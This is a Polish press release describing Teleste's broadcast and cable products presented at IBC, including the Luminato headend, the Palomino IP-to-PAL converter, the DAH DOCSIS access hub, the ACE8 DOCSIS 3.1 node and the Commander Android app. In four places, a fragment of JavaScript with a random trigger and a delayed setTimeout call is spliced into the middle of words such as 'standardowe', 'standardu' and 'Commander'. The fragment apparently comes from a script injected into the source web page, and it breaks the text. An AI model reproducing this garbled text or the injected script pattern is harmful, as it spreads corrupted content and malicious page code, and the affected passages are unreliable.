Teleste pomaga operatorom w zapewnieniu odbiorcom atrakcyjnych usług TV i wideo

Obecnie konsumenci oczekują wysokiej jakości strumienia wideo na odbiornikach TV, smartfonach, tabletach oraz komputerach. Jednocześnie nastąpił rozwój formatów HD i 4K, a także usług takich jak OTT. W konsekwencji, sieci stają się coraz bardziej ‘zatłoczone’, a zapotrzebowanie na różne typy strumieni oraz różne przepustowości sieci wzrasta. Wyzwaniem dla operatorów oraz dostawców treści jest zbudowanie nowej usługi, spełniającej wszystkie potrzeby konsumentów. Na tegorocznej edycji IBC w Amsterdamie Teleste zaprezentowało rozwiązania, które pomogą operatorom w realizacji treści, od stacji czołowej po ekrany odbiorców, a także utrzymanie wysokiej jakości usług i zapewnienie ich elastyczności w stosunku do przyszłych potrzeb.

  • Teleste Luminato – najbardziej  niezawodna platforma stacji, czołowej przeznaczona do odbioru, przetwarzania oraz nadawania sygnałów telewizyjnych, posiadająca wiele zastosowań – zarówno dla małych, jak i dużych platform. Wspiera serwisy m.in. DVB-S2, DVB-T2, ISDB-T, ASI i IP, a także oferuje zaawansowane funkcje selektywnego odbioru usługi, remultiplexingu oraz ochrony kontentu.
  • Teleste Optimo – wiodące rozwiązanie dla aplikacji OTT i DVB. Zapewnia wyjątkową wydajność i przepustowość na każdym z ekranów: od smartfonów po TV, konsole do gier i wiele innych.
  • Teleste Palomino – najnowszy konwerter IP do PAL. Jego w pełni cyfrowa architektura umożliwia pracę na poziomie operatorskim oraz działanie w każdych warunkach. Wszechstronne Palomino o kompaktowej obudowie 1RU obsługuje 8 kanałów, a przepływność wejściowa po IP wynosi do 300 Mbit/p. Urządzenie posiada następujące funkcjonalności: odbiór strumienia IP w formatach SPTS i MPTS, demultipleksing, dekodowanie odebranych kanałów oraz modulację do postaci analogowej. Zasilanie urządzenia jest standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andardowe. Jako dodatkową funkcję Palomino posiada wsparcie dla redundancji strumienia wejściowego IP. Każdy z 8 wyjściowych portów RF jest pojedynczo i niezależnie programowalny w pełnym zakresie częstotliwości od 47 do 862 MHz. Pozwala to na elastyczne i sprawne korzystanie z dostępnego spektrum kanałów, a także umożliwia uzyskanie wysokiej jakości parametrów wideo i audio, w odróżnieniu od konwencjonalnych rozwiązań. Wejście strumienia IP wspiera formaty unicast oraz multicast, zaś opcja redundantnego wejścia zapewnia wsparcie dla wymieniowych formatów. Wejście IP może być elektryczne lub optyczne. Urządzenie posiada także wejście ASI jako opcjonalne źródło sygnału. Palomino dekoduje zarówno sygnały SD, jak i HD. W przypadku dekodowania HD jednocześnie wykonuje downscaling (zmianę rozdzielczości na mniejszą). Urządzenie automatycznie transkoduje teletekst do analogu, a liczne formaty i tryby audio są możliwe do dekodowania i modulowania na analogowe mono i stereo. Zarządzanie i konfiguracja Palomino odbywają się w intuicyjnym interfejsie WEB, po SNMP i Telnecie. Ustawienia zarządzania oraz statusu parametrów urządzenia i sygnału są kompleksowe. Palomino jest idealnym rozwiązaniem dla wyniesionych stacji, stacji centralnych oraz innych rodzajów sieci kablowych, takich jak hotele czy szpitale. W przypadku, gdy transmisja analogowa zostanie całkowicie wyłączona, Palomino może być zmienione w konwerter IP do QAM poprzez aktualizację oprogramowania i wgranie nowej funkcjonalności, dzięki czemu staje się przyszłościowym rozwiązaniem.
  • DAH (DOCSIS Access Hub) – Teleste jest pionierem we wdrażaniu urządzeń wykorzystujących technologię data over coax, która zakłada wykorzystanie kabla koncentrycznego do transmisji danych na etapie ostatniej mili. Dzięki wieloletniemu doświadczeniu firmy Teleste w branży HFC opracowano urządzenie zoptymalizowane pod rynek europejski. TELESTE DAH występuje w dwóch wersjach: z wejściem optycznym 1310/1550nm oraz wejściem RF dla telewizji. Podstawowa wersja z odbiornikiem optycznym doskonale nadaje się do architektury FTTB/FTTC, gdzie dzięki modułowi optycznemu usługi telewizji będą dostarczane z wykorzystaniem światłowodu, a wbudowany wewnątrz moduł CMTS zostanie wykorzystany do transmisji danych. Wersja z wejściem RF dla telewizji, będzie bardzo dobrym rozwiązaniem przeznaczonym do zastosowań, w których sygnał telewizyjny jest dostarczany z wykorzystaniem kabla koncentrycznego. Liczba downstreamów w modułe CMTS wynosi 4,8 bądź 16, liczba upstreamów 4. Wyjściowy stopień wzmacniający w obu wersjach DAH oparty jest na technologi GaN, zapewniając najlepsze parametry wymagane w nowoczesnych sieciach HFC.
  • Teleste ACE8 – inteligentny nod optyczny, pierwszy na rynku spełniający wymagania DOCSIS 3.1. Zaprojektowany do nowoczesnych instalacji sieciowych, ACE8 oferuje dostawcom usług dostęp do wysokiej wydajności transmisji. ACE8 spełnia wymagania standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andardu DOCSIS 3.1 i DVB-C2. Częstotliwość downstream sięga 1,2 GHz, odpowiadając tym samym przyszłym wymaganiom wyższej przepustowości. Upstream może być łatwo rozszerzony do 200 MHz. Nod optyczny ACE8 bazuje na wbudowanym odbiorniku optycznym DS oraz modułowych nadajnikach US, wykorzystując wysoko wydajną hybrydę GaN w stopniu wyjściowym. Umożliwia uzyskiwanie wysokich poziomów wyjściowych, powodując tym samym zwiększenie odporności na szumy i zakłócenia. ACE8  został nominowany do nagrody CSI 2014 w kategorii „Best cable of fibre contribution/distribution/transmission solution”.

Niewątpliwie godna uwagi jest aplikacja Teleste Commandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander na Androida, zaprojektowana do bezprzewodowego zarządzania nodami optycznymi oraz wzmacniaczami Teleste. Jest to pierwsza wersja aplikacji Teleste Commandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander. Pozwala ona na wypróbowanie podstawowych możliwości konfiguracji zadań.

www.teleste.com